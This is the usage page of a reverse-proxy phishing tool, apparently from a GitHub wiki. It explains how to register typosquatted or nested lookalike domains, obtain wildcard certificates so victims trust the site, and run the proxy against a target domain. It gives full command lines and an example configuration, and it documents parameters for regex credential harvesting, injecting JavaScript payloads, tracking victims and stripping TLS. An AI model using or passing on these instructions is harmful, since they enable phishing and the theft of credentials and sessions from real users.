-
Notifications
You must be signed in to change notification settings - Fork 885
How to use
To run a good campaign you will need:
- a registered domain name
- a wildcard SSL certificate
Note: These are actually optional if you don't want to run over TLS or register your own domain.
Before you start any e-mail phishing campaign, you will need a credible domain name. Obviously, in order to minimize the risk of being easily spotted by the user the chosen domain should be as similar to the original as possible.
The registered domain should point to the server where Modlishka is currently running.
Add 'A' record with the right IP address and a wildcard 'CNAME' '*' record.
All subdomains should resolve to the same IP address.
Modlishka currently supports the following domain schemes:
a. 'One to One' Domain translation
Example: victim.cc or victin.com for the target domain victim.com Tip: Try to find domain names with different tlds or that are mistyped.
b. 'Nested' domain translation
Example: victim.com.α.host Tip: Try to find the shortest possible domain name and include the target domain as a subdomain.
The choice of the right approach is yours. There are a lot of different registrars out there which you can use to find you perfect domain.
SSL certificate in most cases gives a victum user an impression that the website is trusted. If you want to raise the effectiveness of your campaigns you should also get one for your phishing domain.
Modlishka requires a wildcard certificate for you phishing domain, which can be obtained manually through one of your registrars or you can use LetsEncrypt and acme.sh script to automate this part. You will need a PEM certificate and key in order to use it with Modlishka.
There's a plugin called 'letsencrypt' that is basically a wrapper around 'acme.sh' script. It will however, fetch a certificate and pre-generate a JSON config file for you.
Use the following command to generate JSON configuration file with a certificate for 'nested' domain:
./proxy -plugins letsencrypt -acmeDNSMethod dns_aws -acmeDomain example.com.evildomain.co -acmePath acme.sh/acme.sh -acmeOuput /tmp/
or this for a simple '1:1' translation:
./proxy -plugins letsencrypt -acmeDNSMethod dns_aws -acmeDomain evildomain.co -acmePath acme.sh/acme.sh -acmeOuput /tmp/
You can use and configure Modlishka through the command line parameters.
The following command will launch the proxy without any encryption (it's also a great way to MITM pages and strip encryption from the whole communication channel for the target web page)
./sudo ./dist/proxy -target https://target-domain.com -phishing phishing.dev -listeningPort 80
where the target parameter points to the domain that should be proxied (url scheme should be included) and phishing defines the phishing domain.
A better and more convenient approach is to use JSON configuration files. You can find example files here.
./sudo ./dist/proxy -config you.config.json
Note: Ensure to add a certificate to the configuration file if you want to serve pages over TLS.
Example configuration file:
{
"phishingDomain": "phishing-domain.com.dev",
"listeningPort": "443",
"listeningAddress": "127.0.0.1",
"target": "https://target-domain.com",
"targetResources": "",
"targetRules": "PC9oZWFkPg==:",
"terminateTriggers": "",
"terminateRedirectUrl": "",
"trackingCookie": "id",
"trackingParam": "id",
"useTls": true,
"jsRules":"",
"debug": true,
"logPostOnly": false,
"disableSecurity": false,
"log": "requests.log",
"plugins": "all",
"cert": "",
"certKey": "",
"certPool": ""
}
Modlishka supports the following parameters:
- acmeDNSMethod
This is the 'letsencrypt' plugin parameter, that defines the dns verification method for you DNS service, that will be used during automatic SSL certificate generation.
There are currently over 55 available. Please refer to 'acme.sh' documentation.
Remember to export you API keys as env. variables.
- acmeDomain
Phishing domain for which we want to grab the SSL certificate. For example : my-phishing-domain.com. TIP: Domains can have multiple levels.
- acmeOuput
Output directory for the generated JSON config file (default "/tmp/"). After the configuration file is generated, make sure that all of the required settings are set.
- acmeOuput
Path to the acme.sh bash script.
-
cert In case, for some reason, you want to provide the content of the PEM certificate through the command line parameter. Base64 encode it to create a single string (bash is very picky about extra chars.)
-
certKey
Similar as in case of the certificate, base64 encode the SSL certificate key.
-
certPool
Base64 encoded Certification Authority certificate -
config
Path to the JSON configuration file. It is recommended to either use cmd line parameters or configuration files. -
credParams
-credParams string Credential regexp collector with matching groups. Example baase64(username_regex),baase64(password_regex)
-debug Print debug information
-disableSecurity Disable security features like anti-SSRF. Disable at your own risk.
-jsRules string Comma separated list of URL patterns and JS base64 encoded payloads that will be injected.
-listeningAddress string Listening address (default "127.0.0.1")
-listeningPort string Listening port (default "443")
-log string Local file to which fetched requests will be written (appended)
-phishing string Phishing domain to create - Ex.: target.co
-plugins string Comma seperated list of enabled plugin names (default "all")
-postOnly Log only HTTP POST requests
-rules string Comma separated list of 'string' patterns and their replacements.
-target string Main target to proxy - Ex.: https://target.com
-targetRes string Comma separated list of target subdomains that need to pass through the proxy
-terminateTriggers string Comma separated list of URLs from target's origin which will trigger session termination
-terminateUrl string URL to redirect the client after session termination triggers
-tls Enable TLS (default false)
-trackingCookie string Name of the HTTP cookie used to track the victim (default "id")
-trackingParam string Name of the HTTP parameter used to track the victim (default "id")